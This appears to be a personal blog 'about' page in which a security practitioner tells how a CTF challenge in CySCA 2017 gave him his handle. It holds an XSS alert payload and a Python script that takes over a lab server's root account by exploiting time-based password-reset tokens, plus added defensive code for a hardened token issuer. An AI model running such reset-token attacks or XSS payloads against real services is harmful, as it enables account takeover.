corporate

I am someone who did not realise that you could make a career out of typing "><script>alert('how good is xss aye?');</script> (an oversimplification, but you get the point), until I ran into some friendly folk over at UTS Cyber Security Society. From there I partook in the Cyber Security Challenge Australia (CySCA) 2017, and well - the rest as they say is history.

the story of how i got the handle “2keebs”

The year was 2017, I was a fresh uni student who had somehow found his way into competing in a competition called “Cyber Security Challenge Australia” (CySCA). This was my first ever Capture The Flag (CTF) competition, and I was very, very new to the world of cyber security. Due to the actions and method I used to solve one of the challenges, I gained the handle “2keebs” - which stands for 2 keyboards (a keeb is an affectionate term given to a keyboard).

the challenge itself

If you wish to, you can find the full writeup for the challenge on the official CySCA website. This is the tl;dr version.

Resetting the password for the normal user involved calling an API to request a password reset token. This token, I soon discovered, was being generated based on time, which meant that if I called the API for both the normal user and the admin account at the same exact time, they would have the same reset token. This would allow me to reset the password for the admin account by changing it for the normal user.
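Why a clock-derived token collides across accounts, next to an issuer that avoids it. This is an added example, not code from the challenge or the original post: the weak derivation (a hash of the timestamp truncated to whole seconds), the `ResetTokenStore` class and the `user`/`admin` names are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

def weak_reset_token(now: float) -> str:
    """Assumed vulnerable scheme: the token depends only on the clock (1 s resolution)."""
    return hashlib.sha256(str(int(now)).encode()).hexdigest()[:8]

class ResetTokenStore:
    """Hardened issuer (hypothetical): CSPRNG token, bound to one user, expiring, single-use."""

    def __init__(self, ttl_seconds: int = 600):
        self.ttl = ttl_seconds
        self._pending = {}  # username -> (sha256 of token, expiry time)

    def issue(self, username: str, now: float) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, no clock input
        digest = hashlib.sha256(token.encode()).digest()
        self._pending[username] = (digest, now + self.ttl)  # store only the hash
        return token

    def redeem(self, username: str, token: str, now: float) -> bool:
        # The pending entry is removed on every attempt, so a token works at most once.
        entry = self._pending.pop(username, None)
        if entry is None:
            return False
        digest, expiry = entry
        candidate = hashlib.sha256(token.encode()).digest()
        return now <= expiry and hmac.compare_digest(candidate, digest)

def demo() -> dict:
    now = 1_500_000_000.25  # constructed timestamp
    later = now + 0.5       # a second request landing within the same second
    store = ResetTokenStore()
    user_token = store.issue("user", now)
    admin_token = store.issue("admin", later)
    return {
        "weak_collision": weak_reset_token(now) == weak_reset_token(later),
        "strong_collision": user_token == admin_token,
        "cross_account": store.redeem("admin", user_token, later),
        "own_account": store.redeem("user", user_token, later),
        "replay": store.redeem("user", user_token, later),
    }

if __name__ == "__main__":
    print(demo())
```

The lookup is keyed by username, so a token issued for one account is never checked against another account's entry, even if two values were somehow equal.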

Now someone who knew what they were doing would’ve made a script like this:

import logging

import coloredlogs
import requests

coloredlogs.install(level='DEBUG')

SERVER_IP = "10.13.37.210:8002"

should_register = input("Should I register an account? [y/n]: ")

# Optionally register the normal user account first
if should_register == "y":
    register = requests.get("http://%s/api/public/user/register" % SERVER_IP, data={
        'username': 'hacker',
        'password': 'hacker01',
        'phonenr': '0400137137'
    })

    logging.debug(register.text)

# Request a reset token for both accounts back to back
root_reset_token = requests.get('http://%s/api/public/user/getResetToken' % SERVER_IP, data={'username': 'root'})
my_reset_token = requests.get('http://%s/api/public/user/getResetToken' % SERVER_IP, data={'username': 'hacker'})

logging.debug(root_reset_token.text)
logging.debug(my_reset_token.text)

logging.info("[+] Reset token should have been sent to your phone (cli.bin)")

# The token delivered for the normal user is submitted for 'root'
reset_token = input("Please provide your reset token: ")
reset_password = requests.get('http://%s/api/public/user/resetPassword' % SERVER_IP, data={
    'username': 'root',
    'token': reset_token,
    'newPassword': 'yolo',
    'confirmNewPassword': 'yolo'
})

logging.info("[+] The password for 'root' should now be 'yolo'")

# Log in as 'root' with the new password
result = requests.get('http://%s/api/private/user/parcels' % SERVER_IP, {
    'username': 'root',
    'password': 'yolo'
})

logging.info(result.text)

logging.info('[+] Python scriptttt OUT!')

Being the fresh first year student that I was, I had absolutely no idea whatsoever on how to make a script like that. I knew it was possible, just not how. Under normal circumstances I would have taken the time to learn the requests module, and understood how to make the above script. But, this was no ordinary situation.

Time was ticking. Points were being gained by the opposition. The challenge was yet to be solved. I wanted to be the first.

Using big brain strategy, I asked my mate if I could borrow his machine for a bit. I used curl on both our devices to call the API at the same time. In true Hackerman style (or, if you’re more modern, CSI: Cyber), I spammed the enter key on both our machines until the time matched up exactly (down to the seconds) in order to get the same reset token.

Admin was mine!

During our post-competition feed, a member from another team remembered my antics and brought it up as:

“hey you’re that 2 keyboards guy”

And so my handle from then on became 2keebs. Soon after, on an unrelated (or perhaps not so unrelated) note, my mechanical keyboard addiction began.

individual

Outside of security I am a hobby collector. As such I tend to find myself absorbed in one of the following hobbies:

  • photography (ig: @2keebs)
  • gym (deadlifts > all other lifts)
  • fashion (or so i like to think)
  • motorbikes (2015 MT-07)

the keyboards

  • Happy Hacking Keyboard Professional Hybrid
  • Despite the handle 2keebs, I currently only have one keyboard. Talk about false advertisement, amirite?